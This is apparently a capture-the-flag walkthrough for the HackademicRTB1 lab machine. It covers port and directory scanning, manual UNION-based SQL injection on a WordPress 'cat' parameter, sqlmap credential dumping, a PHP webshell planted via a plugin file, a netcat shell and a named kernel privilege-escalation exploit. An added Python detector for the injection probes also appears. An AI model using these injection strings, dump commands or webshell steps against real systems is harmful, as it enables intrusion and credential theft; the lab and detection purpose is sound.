• Netdiscover
• Nmap
• Wfuzz
• Nikto
• Wpscan


Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation

Use netdiscover to detect the target IP address.

netdiscover -i eth0 -r is the target.

Then run nmap to detect open ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Only port 80 is open.

Use both wfuzz and nikto to scan the host; nothing interesting.

Check the page,

Find a link.

Use wfuzz to scan:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

There is a WordPress site.

Use wpscan to scan.


There are a couple of exploits, I tried both of them and no luck.

Enumerate the page and find a possible SQL injection point:

Looks like the parameter cat is vulnerable.

Next try: order by 1

Keep trying until order by 6

Got an error. Now I know the table used by the vulnerable page has 5 columns.

Next: union all select 1,2,3,4,5

Now I can use the second column for the injection: ,@@version,3,4,5
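From the defender's side, the ORDER BY column-counting and UNION SELECT probes above leave a distinctive trail in the web server's access log. The following Python script is an added example, not part of the original writeup: it scans constructed Apache-style log lines for that probing sequence against the `cat` parameter; the log lines, client IPs and parameter name are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs, unquote_plus

# Constructed sample access log lines (not from the original page); they mimic
# the "order by N" then "union all select" probing sequence against ?cat=.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?cat=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?cat=1%20order%20by%201 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?cat=1%20order%20by%206 HTTP/1.1" 500 311
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?cat=1%20union%20all%20select%201,@@version,3,4,5 HTTP/1.1" 200 5230
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?cat=3 HTTP/1.1" 200 4870
"""

# Common log format: client ip, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Probe signatures matching the enumeration steps in this attack chain.
PROBES = {
    "order_by": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
}

def scan_access_log(text, param="cat"):
    """Return {client_ip: {"hits": [(matched_probes, decoded_value), ...],
    "error_responses": n}} for requests whose `param` carries an SQLi probe.
    A 5xx response to a probe (e.g. order by 6) is counted separately, since a
    run of probes ending in a server error is a strong column-counting signal."""
    findings = defaultdict(lambda: {"hits": [], "error_responses": 0})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        # parse_qs percent-decodes once; unquote_plus again catches double encoding
        for value in parse_qs(urlparse(target).query).get(param, []):
            decoded = unquote_plus(value)
            matched = [name for name, rx in PROBES.items() if rx.search(decoded)]
            if matched:
                findings[ip]["hits"].append((matched, decoded))
                if status >= 500:
                    findings[ip]["error_responses"] += 1
    return dict(findings)
```

Feed the function a real access log and alert on any client with both a hit and a non-zero error count; the fix on the application side is a parameterised query for `cat`, which makes the probes harmless regardless of detection.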

Next, use sqlmap to get all tables:

sqlmap -u "" --dbms mysql --tables --level=5 --risk=3

Get the table names:

I want to check the table wp_users:

sqlmap -u '' -D wordpress -T wp_users --columns

Dump these two columns:

sqlmap -u '' -D wordpress -T wp_users -C user_nickname,user_pass --dump

Now we can edit a PHP webshell via a plugin.

Only textile1.php can be updated. Use that file to edit the shell.

Set up netcat, and load

Get a shell:

python -c 'import pty; pty.spawn("/bin/bash")'

uname -a

Result: Linux HackademicRTB1 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

I tried several local exploits and found this one works:

Get root: